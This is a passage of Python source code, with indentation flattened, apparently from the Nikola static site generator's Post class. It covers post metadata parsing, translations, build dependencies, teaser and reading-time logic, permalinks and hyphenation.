# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""The Post class."""
from __future__ import unicode_literals, print_function, absolute_import
import io
from collections import defaultdict
import datetime
import hashlib
import json
import os
import re
import string
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin # NOQA
from . import utils
import dateutil.tz
import lxml.html
import html5lib
import natsort
try:
import pyphen
except ImportError:
pyphen = None
from math import ceil
# for tearDown with _reload we cannot use 'from import' to get forLocaleBorg
import nikola.utils
from .utils import (
current_time,
Functionary,
LOGGER,
LocaleBorg,
slugify,
to_datetime,
unicode_str,
demote_headers,
get_translation_candidate,
unslugify,
)
from .rc4 import rc4
__all__ = ('Post',)
TEASER_REGEXP = re.compile('<!--\s*TEASER_END(:(.+))?\s*-->', re.IGNORECASE)
_UPGRADE_METADATA_ADVERTISED = False
class Post(object):
"""Represent a blog post or site page."""
def __init__(
self,
source_path,
config,
destination,
use_in_feeds,
messages,
template_name,
compiler
):
"""Initialize post.
The source path is the user created post file. From it we calculate
the meta file, as well as any translations available, and
the .html fragment file path.
"""
self.config = config
self.compiler = compiler
self.compile_html = self.compiler.compile_html
self.demote_headers = self.compiler.demote_headers and self.config['DEMOTE_HEADERS']
tzinfo = self.config['__tzinfo__']
if self.config['FUTURE_IS_NOW']:
self.current_time = None
else:
self.current_time = current_time(tzinfo)
self.translated_to = set([])
self._prev_post = None
self._next_post = None
self.base_url = self.config['BASE_URL']
self.is_draft = False
self.is_private = False
self.is_mathjax = False
self.strip_indexes = self.config['STRIP_INDEXES']
self.index_file = self.config['INDEX_FILE']
self.pretty_urls = self.config['PRETTY_URLS']
self.source_path = source_path # posts/blah.txt
self.post_name = os.path.splitext(source_path)[0] # posts/blah
# cache[\/]posts[\/]blah.html
self.base_path = os.path.join(self.config['CACHE_FOLDER'], self.post_name + ".html")
# cache/posts/blah.html
self._base_path = self.base_path.replace('\\', '/')
self.metadata_path = self.post_name + ".meta" # posts/blah.meta
self.folder = destination
self.translations = self.config['TRANSLATIONS']
self.default_lang = self.config['DEFAULT_LANG']
self.messages = messages
self.skip_untranslated = not self.config['SHOW_UNTRANSLATED_POSTS']
self._template_name = template_name
self.is_two_file = True
self.newstylemeta = True
self._reading_time = None
self._remaining_reading_time = None
self._paragraph_count = None
self._remaining_paragraph_count = None
self._dependency_file_fragment = defaultdict(list)
self._dependency_file_page = defaultdict(list)
self._dependency_uptodate_fragment = defaultdict(list)
self._dependency_uptodate_page = defaultdict(list)
default_metadata, self.newstylemeta = get_meta(self, self.config['FILE_METADATA_REGEXP'], self.config['UNSLUGIFY_TITLES'])
self.meta = Functionary(lambda: None, self.default_lang)
self.meta[self.default_lang] = default_metadata
# Load internationalized metadata
for lang in self.translations:
if os.path.isfile(get_translation_candidate(self.config, self.source_path, lang)):
self.translated_to.add(lang)
if lang != self.default_lang:
meta = defaultdict(lambda: '')
meta.update(default_metadata)
_meta, _nsm = get_meta(self, self.config['FILE_METADATA_REGEXP'], self.config['UNSLUGIFY_TITLES'], lang)
self.newstylemeta = self.newstylemeta and _nsm
meta.update(_meta)
self.meta[lang] = meta
if not self.is_translation_available(self.default_lang):
# Special case! (Issue #373)
# Fill default_metadata with stuff from the other languages
for lang in sorted(self.translated_to):
default_metadata.update(self.meta[lang])
if 'date' not in default_metadata and not use_in_feeds:
# For stories we don't *really* need a date
if self.config['__invariant__']:
default_metadata['date'] = datetime.datetime(2013, 12, 31, 23, 59, 59, tzinfo=tzinfo)
else:
default_metadata['date'] = datetime.datetime.utcfromtimestamp(
os.stat(self.source_path).st_ctime).replace(tzinfo=dateutil.tz.tzutc()).astimezone(tzinfo)
# If time zone is set, build localized datetime.
self.date = to_datetime(self.meta[self.default_lang]['date'], tzinfo)
if 'updated' not in default_metadata:
default_metadata['updated'] = default_metadata.get('date', None)
self.updated = to_datetime(default_metadata['updated'])
if 'title' not in default_metadata or 'slug' not in default_metadata \
or 'date' not in default_metadata:
raise OSError("You must set a title (found '{0}'), a slug (found "
"'{1}') and a date (found '{2}')! [in file "
"{3}]".format(default_metadata.get('title', None),
default_metadata.get('slug', None),
default_metadata.get('date', None),
source_path))
if 'type' not in default_metadata:
# default value is 'text'
default_metadata['type'] = 'text'
self.publish_later = False if self.current_time is None else self.date >= self.current_time
is_draft = False
is_private = False
self._tags = {}
for lang in self.translated_to:
self._tags[lang] = natsort.natsorted(
list(set([x.strip() for x in self.meta[lang]['tags'].split(',')])),
alg=natsort.ns.F | natsort.ns.IC)
self._tags[lang] = [t for t in self._tags[lang] if t]
if 'draft' in [_.lower() for _ in self._tags[lang]]:
is_draft = True
LOGGER.debug('The post "{0}" is a draft.'.format(self.source_path))
self._tags[lang].remove('draft')
# TODO: remove in v8
if 'retired' in self._tags[lang]:
is_private = True
LOGGER.warning('The "retired" tag in post "{0}" is now deprecated and will be removed in v8. Use "private" instead.'.format(self.source_path))
self._tags[lang].remove('retired')
# end remove in v8
if 'private' in self._tags[lang]:
is_private = True
LOGGER.debug('The post "{0}" is private.'.format(self.source_path))
self._tags[lang].remove('private')
# While draft comes from the tags, it's not really a tag
self.is_draft = is_draft
self.is_private = is_private
self.is_post = use_in_feeds
self.use_in_feeds = use_in_feeds and not is_draft and not is_private \
and not self.publish_later
# If mathjax is a tag, or it's a ipynb post, then enable mathjax rendering support
self.is_mathjax = ('mathjax' in self.tags) or (self.compiler.name == 'ipynb')
# Register potential extra dependencies
self.compiler.register_extra_dependencies(self)
def _get_hyphenate(self):
return bool(self.config['HYPHENATE'] or self.meta('hyphenate'))
hyphenate = property(_get_hyphenate)
def __repr__(self):
"""Provide a representation of the post object."""
# Calculate a hash that represents most data about the post
m = hashlib.md5()
# source_path modification date (to avoid reading it)
m.update(utils.unicode_str(os.stat(self.source_path).st_mtime).encode('utf-8'))
clean_meta = {}
for k, v in self.meta.items():
sub_meta = {}
clean_meta[k] = sub_meta
for kk, vv in v.items():
if vv:
sub_meta[kk] = vv
m.update(utils.unicode_str(json.dumps(clean_meta, cls=utils.CustomEncoder, sort_keys=True)).encode('utf-8'))
return '<Post: {0!r} {1}>'.format(self.source_path, m.hexdigest())
def _has_pretty_url(self, lang):
if self.pretty_urls and \
self.meta[lang].get('pretty_url', '') != 'False' and \
self.meta[lang]['slug'] != 'index':
return True
else:
return False
@property
def alltags(self):
"""Return ALL the tags for this post."""
tags = []
for l in self._tags:
tags.extend(self._tags[l])
return list(set(tags))
def tags_for_language(self, lang):
"""Return tags for a given language."""
if lang in self._tags:
return self._tags[lang]
elif lang not in self.translated_to and self.skip_untranslated:
return []
elif self.default_lang in self._tags:
return self._tags[self.default_lang]
else:
return []
@property
def tags(self):
"""Return tags for the current language."""
lang = nikola.utils.LocaleBorg().current_lang
return self.tags_for_language(lang)
@property
def prev_post(self):
"""Return previous post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._prev_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._prev_post
return rv
@prev_post.setter # NOQA
def prev_post(self, v):
"""Set previous post."""
self._prev_post = v
@property
def next_post(self):
"""Return next post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._next_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._next_post
return rv
@next_post.setter # NOQA
def next_post(self, v):
"""Set next post."""
self._next_post = v
@property
def template_name(self):
"""Return template name for this post."""
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['template'] or self._template_name
def formatted_date(self, date_format, date=None):
"""Return the formatted date as unicode."""
return utils.LocaleBorg().formatted_date(date_format, date if date else self.date)
def formatted_updated(self, date_format):
"""Return the updated date as unicode."""
return self.formatted_date(date_format, self.updated)
def title(self, lang=None):
"""Return localized title.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['title']
def author(self, lang=None):
"""Return localized author or BLOG_AUTHOR if unspecified.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self.meta[lang]['author']:
author = self.meta[lang]['author']
else:
author = self.config['BLOG_AUTHOR'](lang)
return author
def description(self, lang=None):
"""Return localized description."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['description']
def add_dependency(self, dependency, add='both', lang=None):
"""Add a file dependency for tasks using that post.
The ``dependency`` should be a string specifying a path, or a callable
which returns such a string or a list of strings.
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
If ``lang`` is not specified, this dependency is added for all languages.
"""
if add not in {'fragment', 'page', 'both'}:
raise Exception("Add parameter is '{0}', but must be either 'fragment', 'page', or 'both'.".format(add))
if add == 'fragment' or add == 'both':
self._dependency_file_fragment[lang].append((type(dependency) != str, dependency))
if add == 'page' or add == 'both':
self._dependency_file_page[lang].append((type(dependency) != str, dependency))
def add_dependency_uptodate(self, dependency, is_callable=False, add='both', lang=None):
"""Add a dependency for task's ``uptodate`` for tasks using that post.
This can be for example an ``utils.config_changed`` object, or a list of
such objects.
The ``is_callable`` parameter specifies whether ``dependency`` is a
callable which generates an entry or a list of entries for the ``uptodate``
list, or whether it is an entry which can directly be added (as a single
object or a list of objects).
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
If ``lang`` is not specified, this dependency is added for all languages.
Example:
post.add_dependency_uptodate(
utils.config_changed({1: some_data}, 'uniqueid'), False, 'page')
"""
if add == 'fragment' or add == 'both':
self._dependency_uptodate_fragment[lang].append((is_callable, dependency))
if add == 'page' or add == 'both':
self._dependency_uptodate_page[lang].append((is_callable, dependency))
def _get_dependencies(self, deps_list):
deps = []
for dep in deps_list:
if dep[0]:
# callable
result = dep[1]()
else:
# can add directly
result = dep[1]
# if result is a list, add its contents
if type(result) == list:
deps.extend(result)
else:
deps.append(result)
return deps
def deps(self, lang):
"""Return a list of file dependencies to build this post's page."""
deps = []
if self.default_lang in self.translated_to:
deps.append(self.base_path)
deps.append(self.source_path)
if os.path.exists(self.metadata_path):
deps.append(self.metadata_path)
if lang != self.default_lang:
cand_1 = get_translation_candidate(self.config, self.source_path, lang)
cand_2 = get_translation_candidate(self.config, self.base_path, lang)
if os.path.exists(cand_1):
deps.extend([cand_1, cand_2])
cand_3 = get_translation_candidate(self.config, self.metadata_path, lang)
if os.path.exists(cand_3):
deps.append(cand_3)
deps += self._get_dependencies(self._dependency_file_page[lang])
deps += self._get_dependencies(self._dependency_file_page[None])
return sorted(deps)
def deps_uptodate(self, lang):
"""Return a list of uptodate dependencies to build this post's page.
These dependencies should be included in ``uptodate`` for the task
which generates the page.
"""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_page[lang])
deps += self._get_dependencies(self._dependency_uptodate_page[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def compile(self, lang):
"""Generate the cache/ file with the compiled post."""
def wrap_encrypt(path, password):
"""Wrap a post with encryption."""
with io.open(path, 'r+', encoding='utf8') as inf:
data = inf.read() + "<!--tail-->"
data = CRYPT.substitute(data=rc4(password, data))
with io.open(path, 'w+', encoding='utf8') as outf:
outf.write(data)
dest = self.translated_base_path(lang)
if not self.is_translation_available(lang) and not self.config['SHOW_UNTRANSLATED_POSTS']:
return
# Set the language to the right thing
LocaleBorg().set_locale(lang)
self.compile_html(
self.translated_source_path(lang),
dest,
self.is_two_file),
if self.meta('password'):
# TODO: get rid of this feature one day (v8?; warning added in v7.3.0.)
LOGGER.warn("The post {0} is using the `password` attribute, which may stop working in the future.")
LOGGER.warn("Please consider switching to a more secure method of encryption.")
LOGGER.warn("More details: https://github.com/getnikola/nikola/issues/1547")
wrap_encrypt(dest, self.meta('password'))
if self.publish_later:
LOGGER.notice('{0} is scheduled to be published in the future ({1})'.format(
self.source_path, self.date))
def fragment_deps(self, lang):
"""Return a list of uptodate dependencies to build this post's fragment.
These dependencies should be included in ``uptodate`` for the task
which generates the fragment.
"""
deps = []
if self.default_lang in self.translated_to:
deps.append(self.source_path)
if os.path.isfile(self.metadata_path):
deps.append(self.metadata_path)
lang_deps = []
if lang != self.default_lang:
lang_deps = [get_translation_candidate(self.config, d, lang) for d in deps]
deps += lang_deps
deps = [d for d in deps if os.path.exists(d)]
deps += self._get_dependencies(self._dependency_file_fragment[lang])
deps += self._get_dependencies(self._dependency_file_fragment[None])
return sorted(deps)
def fragment_deps_uptodate(self, lang):
"""Return a list of file dependencies to build this post's fragment."""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_fragment[lang])
deps += self._get_dependencies(self._dependency_uptodate_fragment[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def is_translation_available(self, lang):
"""Return True if the translation actually exists."""
return lang in self.translated_to
def translated_source_path(self, lang):
"""Return path to the translation's source file."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, lang)
elif lang != self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, sorted(self.translated_to)[0])
def translated_base_path(self, lang):
"""Return path to the translation's base_path file."""
return get_translation_candidate(self.config, self.base_path, lang)
def _translated_file_path(self, lang):
"""Return path to the translation's file, or to the original."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, lang)
elif lang != self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, sorted(self.translated_to)[0])
def text(self, lang=None, teaser_only=False, strip_html=False, show_read_more_link=True,
feed_read_more_link=False, feed_links_append_query=None):
"""Read the post file for that language and return its contents.
teaser_only=True breaks at the teaser marker and returns only the teaser.
strip_html=True removes HTML tags
show_read_more_link=False does not add the Read more... link
feed_read_more_link=True uses FEED_READ_MORE_LINK instead of INDEX_READ_MORE_LINK
lang=None uses the last used to set locale
All links in the returned HTML will be relative.
The HTML returned is a bare fragment, not a full document.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
# Yes, we compile it and screw it.
# This may be controversial, but the user (or someone) is asking for the post text
# and the post should not just refuse to give it.
if not os.path.isfile(file_name):
self.compile(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
if self.compiler.extension() == '.php':
return data
try:
document = html5lib.html5parser.parse(data, treebuilder='lxml',
namespaceHTMLElements=False)
document = lxml.html.fragment_fromstring(
lxml.html.tostring(document), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise(e)
base_url = self.permalink(lang=lang)
document.make_links_absolute(base_url)
if self.hyphenate:
hyphenate(document, lang)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except:
data = lxml.html.tostring(document, encoding='unicode')
if teaser_only:
teaser_regexp = self.config.get('TEASER_REGEXP', TEASER_REGEXP)
teaser = teaser_regexp.split(data)[0]
if teaser != data:
if not strip_html and show_read_more_link:
if teaser_regexp.search(data).groups()[-1]:
teaser_text = teaser_regexp.search(data).groups()[-1]
else:
teaser_text = self.messages[lang]["Read more"]
l = self.config['FEED_READ_MORE_LINK'](lang) if feed_read_more_link else self.config['INDEX_READ_MORE_LINK'](lang)
teaser += l.format(
link=self.permalink(lang, query=feed_links_append_query),
read_more=teaser_text,
min_remaining_read=self.messages[lang]["%d min remaining to read"] % (self.remaining_reading_time),
reading_time=self.reading_time,
remaining_reading_time=self.remaining_reading_time,
paragraph_count=self.paragraph_count,
remaining_paragraph_count=self.remaining_paragraph_count)
# This closes all open tags and sanitizes the broken HTML
document = lxml.html.fromstring(teaser)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except IndexError:
data = lxml.html.tostring(document, encoding='unicode')
if data and strip_html:
try:
# Not all posts have a body. For example, you may have a page statically defined in the template that does not take content as input.
content = lxml.html.fromstring(data)
data = content.text_content().strip() # No whitespace wanted.
except lxml.etree.ParserError:
data = ""
elif data:
if self.demote_headers:
# see above
try:
document = lxml.html.fromstring(data)
demote_headers(document, self.demote_headers)
data = lxml.html.tostring(document.body, encoding='unicode')
except (lxml.etree.ParserError, IndexError):
data = lxml.html.tostring(document, encoding='unicode')
return data
@property
def reading_time(self):
"""Reading time based on length of text."""
if self._reading_time is None:
text = self.text(strip_html=True)
words_per_minute = 220
words = len(text.split())
markup = lxml.html.fromstring(self.text(strip_html=False))
embeddables = [".//img", ".//picture", ".//video", ".//audio", ".//object", ".//iframe"]
media_time = 0
for embedded in embeddables:
media_time += (len(markup.findall(embedded)) * 0.33) # +20 seconds
self._reading_time = int(ceil((words / words_per_minute) + media_time)) or 1
return self._reading_time
@property
def remaining_reading_time(self):
"""Remaining reading time based on length of text (does not include teaser)."""
if self._remaining_reading_time is None:
text = self.text(teaser_only=True, strip_html=True)
words_per_minute = 220
words = len(text.split())
self._remaining_reading_time = self.reading_time - int(ceil(words / words_per_minute)) or 1
return self._remaining_reading_time
@property
def paragraph_count(self):
"""Return the paragraph count for this post."""
if self._paragraph_count is None:
# duplicated with Post.text()
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
try:
document = html5lib.html5parser.parse(
data, treebuilder='lxml', namespaceHTMLElements=False)
document = lxml.html.fragment_fromstring(
lxml.html.tostring(document), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise(e)
# output is a float, for no real reason at all
self._paragraph_count = int(document.xpath('count(//p)'))
return self._paragraph_count
@property
def remaining_paragraph_count(self):
"""Return the remaining paragraph count for this post (does not include teaser)."""
if self._remaining_paragraph_count is None:
try:
# Just asking self.text() is easier here.
document = html5lib.html5parser.parse(
self.text(teaser_only=True, show_read_more_link=False),
treebuilder='lxml', namespaceHTMLElements=False)
document = lxml.html.fragment_fromstring(
lxml.html.tostring(document), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise(e)
self._remaining_paragraph_count = self.paragraph_count - int(document.xpath('count(//p)'))
return self._remaining_paragraph_count
def source_link(self, lang=None):
"""Return absolute link to the post's source."""
ext = self.source_ext(True)
link = "/" + self.destination_path(lang=lang, extension=ext, sep='/')
link = utils.encodelink(link)
return link
def destination_path(self, lang=None, extension='.html', sep=os.sep):
"""Destination path for this post, relative to output/.
If lang is not specified, it's the current language.
Extension is used in the path if specified.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self._has_pretty_url(lang):
path = os.path.join(self.translations[lang],
self.folder, self.meta[lang]['slug'], 'index' + extension)
else:
path = os.path.join(self.translations[lang],
self.folder, self.meta[lang]['slug'] + extension)
if sep != os.sep:
path = path.replace(os.sep, sep)
if path.startswith('./'):
path = path[2:]
return path
def section_color(self, lang=None):
"""Return the color of the post's section."""
slug = self.section_slug(lang)
if slug in self.config['POSTS_SECTION_COLORS'](lang):
return self.config['POSTS_SECTION_COLORS'](lang)[slug]
base = self.config['THEME_COLOR']
return utils.colorize_str_from_base_color(slug, base)
def section_link(self, lang=None):
"""Return the link to the post's section (deprecated)."""
utils.LOGGER.warning("Post.section_link is deprecated. Please use " +
"site.link('section_index', post.section_slug()) instead.")
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
slug = self.section_slug(lang)
t = os.path.normpath(self.translations[lang])
if t == '.':
t = ''
link = '/' + '/'.join(i for i in (t, slug) if i) + '/'
if not self.pretty_urls:
link = urljoin(link, self.index_file)
link = utils.encodelink(link)
return link
def section_name(self, lang=None):
"""Return the name of the post's section."""
slug = self.section_slug(lang)
if slug in self.config['POSTS_SECTION_NAME'](lang):
name = self.config['POSTS_SECTION_NAME'](lang)[slug]
else:
name = slug.replace('-', ' ').title()
return name
def section_slug(self, lang=None):
"""Return the slug for the post's section."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if not self.config['POSTS_SECTION_FROM_META']:
dest = self.destination_path(lang)
if dest[-(1 + len(self.index_file)):] == os.sep + self.index_file:
dest = dest[:-(1 + len(self.index_file))]
dirname = os.path.dirname(dest)
slug = dest.split(os.sep)
if not slug or dirname == '.':
slug = self.messages[lang]["Uncategorized"]
elif lang == slug[0]:
slug = slug[1]
else:
slug = slug[0]
else:
slug = self.meta[lang]['section'].split(',')[0] if 'section' in self.meta[lang] else self.messages[lang]["Uncategorized"]
return utils.slugify(slug)
def permalink(self, lang=None, absolute=False, extension='.html', query=None):
"""Return permalink for a post."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
# Let compilers override extension (e.g. the php compiler)
if self.compiler.extension() != '.html':
extension = self.compiler.extension()
pieces = self.translations[lang].split(os.sep)
pieces += self.folder.split(os.sep)
if self._has_pretty_url(lang):
pieces += [self.meta[lang]['slug'], 'index' + extension]
else:
pieces += [self.meta[lang]['slug'] + extension]
pieces = [_f for _f in pieces if _f and _f != '.']
link = '/' + '/'.join(pieces)
if absolute:
link = urljoin(self.base_url, link[1:])
index_len = len(self.index_file)
if self.strip_indexes and link[-(1 + index_len):] == '/' + self.index_file:
link = link[:-index_len]
if query:
link = link + "?" + query
link = utils.encodelink(link)
return link
@property
def previewimage(self, lang=None):
"""Return the previewimage path."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
image_path = self.meta[lang]['previewimage']
if not image_path:
return None
# This is further parsed by the template, because we don’t have access
# to the URL replacer here. (Issue #1473)
return image_path
def source_ext(self, prefix=False):
"""Return the source file extension.
If `prefix` is True, a `.src.` prefix will be added to the resulting extension
if it's equal to the destination extension.
"""
ext = os.path.splitext(self.source_path)[1]
# do not publish PHP sources
if prefix and ext == '.html':
# ext starts with a dot
return '.src' + ext
else:
return ext
# Code that fetches metadata from different places
def re_meta(line, match=None):
"""Find metadata using regular expressions."""
if match:
reStr = re.compile('^\.\. {0}: (.*)'.format(re.escape(match)))
else:
reStr = re.compile('^\.\. (.*?): (.*)')
result = reStr.findall(line.strip())
if match and result:
return (match, result[0])
elif not match and result:
return (result[0][0], result[0][1].strip())
else:
return (None,)
def _get_metadata_from_filename_by_regex(filename, metadata_regexp, unslugify_titles):
"""Try to reed the metadata from the filename based on the given re.
This requires to use symbolic group names in the pattern.
The part to read the metadata from the filename based on a regular
expression is taken from Pelican - pelican/readers.py
"""
match = re.match(metadata_regexp, filename)
meta = {}
if match:
# .items() for py3k compat.
for key, value in match.groupdict().items():
k = key.lower().strip() # metadata must be lowercase
if k == 'title' and unslugify_titles:
meta[k] = unslugify(value, discard_numbers=False)
else:
meta[k] = value
return meta
def get_metadata_from_file(source_path, config=None, lang=None):
"""Extract metadata from the file itself, by parsing contents."""
try:
if lang and config:
source_path = get_translation_candidate(config, source_path, lang)
elif lang:
source_path += '.' + lang
with io.open(source_path, "r", encoding="utf-8-sig") as meta_file:
meta_data = [x.strip() for x in meta_file.readlines()]
return _get_metadata_from_file(meta_data)
except (UnicodeDecodeError, UnicodeEncodeError):
raise ValueError('Error reading {0}: Nikola only supports UTF-8 files'.format(source_path))
except Exception: # The file may not exist, for multilingual sites
return {}
re_md_title = re.compile(r'^{0}([^{0}].*)'.format(re.escape('#')))
# Assuming rst titles are going to be at least 4 chars long
# otherwise this detects things like ''' wich breaks other markups.
re_rst_title = re.compile(r'^([{0}]{{4,}})'.format(re.escape(
string.punctuation)))
def _get_title_from_contents(meta_data):
"""Extract title from file contents, LAST RESOURCE."""
piece = meta_data[:]
title = None
for i, line in enumerate(piece):
if re_rst_title.findall(line) and i > 0:
title = meta_data[i - 1].strip()
break
if (re_rst_title.findall(line) and i >= 0 and
re_rst_title.findall(meta_data[i + 2])):
title = meta_data[i + 1].strip()
break
if re_md_title.findall(line):
title = re_md_title.findall(line)[0]
break
return title
def _get_metadata_from_file(meta_data):
"""Extract metadata from a post's source file."""
meta = {}
if not meta_data:
return meta
# Skip up to one empty line at the beginning (for txt2tags)
if not meta_data[0]:
meta_data = meta_data[1:]
# First, get metadata from the beginning of the file,
# up to first empty line
for i, line in enumerate(meta_data):
if not line:
break
match = re_meta(line)
if match[0]:
meta[match[0]] = match[1]
# If we have no title, try to get it from document
if 'title' not in meta:
t = _get_title_from_contents(meta_data)
if t is not None:
meta['title'] = t
return meta
def get_metadata_from_meta_file(path, config=None, lang=None):
"""Take a post path, and gets data from a matching .meta file."""
global _UPGRADE_METADATA_ADVERTISED
meta_path = os.path.splitext(path)[0] + '.meta'
if lang and config:
meta_path = get_translation_candidate(config, meta_path, lang)
elif lang:
meta_path += '.' + lang
if os.path.isfile(meta_path):
with io.open(meta_path, "r", encoding="utf8") as meta_file:
meta_data = meta_file.readlines()
# Detect new-style metadata.
newstyleregexp = re.compile(r'\.\. .*?: .*')
newstylemeta = False
for l in meta_data:
if l.strip():
if re.match(newstyleregexp, l):
newstylemeta = True
if newstylemeta:
# New-style metadata is basically the same as reading metadata from
# a 1-file post.
return get_metadata_from_file(path, config, lang), newstylemeta
else:
if not _UPGRADE_METADATA_ADVERTISED:
LOGGER.warn("Some posts on your site have old-style metadata. You should upgrade them to the new format, with support for extra fields.")
LOGGER.warn("Install the 'upgrade_metadata' plugin (with 'nikola plugin -i upgrade_metadata') and run 'nikola upgrade_metadata'.")
_UPGRADE_METADATA_ADVERTISED = True
while len(meta_data) < 7:
meta_data.append("")
(title, slug, date, tags, link, description, _type) = [
x.strip() for x in meta_data][:7]
meta = {}
if title:
meta['title'] = title
if slug:
meta['slug'] = slug
if date:
meta['date'] = date
if tags:
meta['tags'] = tags
if link:
meta['link'] = link
if description:
meta['description'] = description
if _type:
meta['type'] = _type
return meta, newstylemeta
elif lang:
# Metadata file doesn't exist, but not default language,
# So, if default language metadata exists, return that.
# This makes the 2-file format detection more reliable (Issue #525)
return get_metadata_from_meta_file(path, config, lang=None)
else:
return {}, True
def get_meta(post, file_metadata_regexp=None, unslugify_titles=False, lang=None):
"""Get post's meta from source.
If ``file_metadata_regexp`` is given it will be tried to read
metadata from the filename.
If ``unslugify_titles`` is True, the extracted title (if any) will be unslugified, as is done in galleries.
If any metadata is then found inside the file the metadata from the
file will override previous findings.
"""
meta = defaultdict(lambda: '')
try:
config = post.config
except AttributeError:
config = None
_, newstylemeta = get_metadata_from_meta_file(post.metadata_path, config, lang)
meta.update(_)
if not meta:
post.is_two_file = False
if file_metadata_regexp is not None:
meta.update(_get_metadata_from_filename_by_regex(post.source_path,
file_metadata_regexp,
unslugify_titles))
compiler_meta = {}
if getattr(post, 'compiler', None):
compiler_meta = post.compiler.read_metadata(post, file_metadata_regexp, unslugify_titles, lang)
meta.update(compiler_meta)
if not post.is_two_file and not compiler_meta:
# Meta file has precedence over file, which can contain garbage.
# Moreover, we should not to talk to the file if we have compiler meta.
meta.update(get_metadata_from_file(post.source_path, config, lang))
if lang is None:
# Only perform these checks for the default language
if 'slug' not in meta:
# If no slug is found in the metadata use the filename
meta['slug'] = slugify(unicode_str(os.path.splitext(
os.path.basename(post.source_path))[0]))
if 'title' not in meta:
# If no title is found, use the filename without extension
meta['title'] = os.path.splitext(
os.path.basename(post.source_path))[0]
return meta, newstylemeta
def hyphenate(dom, _lang):
"""Hyphenate a post."""
# circular import prevention
from .nikola import LEGAL_VALUES
lang = None
if pyphen is not None:
lang = LEGAL_VALUES['PYPHEN_LOCALES'].get(_lang, pyphen.language_fallback(_lang))
else:
utils.req_missing(['pyphen'], 'hyphenate texts', optional=True)
if pyphen is not None and lang is not None:
# If pyphen does exist, we tell the user when configuring the site.
# If it does not support a language, we ignore it quietly.
try:
hyphenator = pyphen.Pyphen(lang=lang)
except KeyError:
LOGGER.error("Cannot find hyphenation dictoniaries for {0} (from {1}).".format(lang, _lang))
LOGGER.error("Pyphen cannot be installed to ~/.local (pip install --user).")
for tag in ('p', 'li', 'span'):
for node in dom.xpath("//%s[not(parent::pre)]" % tag):
skip_node = False
skippable_nodes = ['kbd', 'code', 'samp', 'mark', 'math', 'data', 'ruby', 'svg']
if node.getchildren():
for child in node.getchildren():
if child.tag in skippable_nodes or (child.tag == 'span' and 'math' in child.get('class', [])):
skip_node = True
elif 'math' in node.get('class', []):
skip_node = True
if not skip_node:
insert_hyphens(node, hyphenator)
return dom
def insert_hyphens(node, hyphenator):
"""Insert hyphens into a node."""
textattrs = ('text', 'tail')
if isinstance(node, lxml.etree._Entity):
# HTML entities have no .text
textattrs = ('tail',)
for attr in textattrs:
text = getattr(node, attr)
if not text:
continue
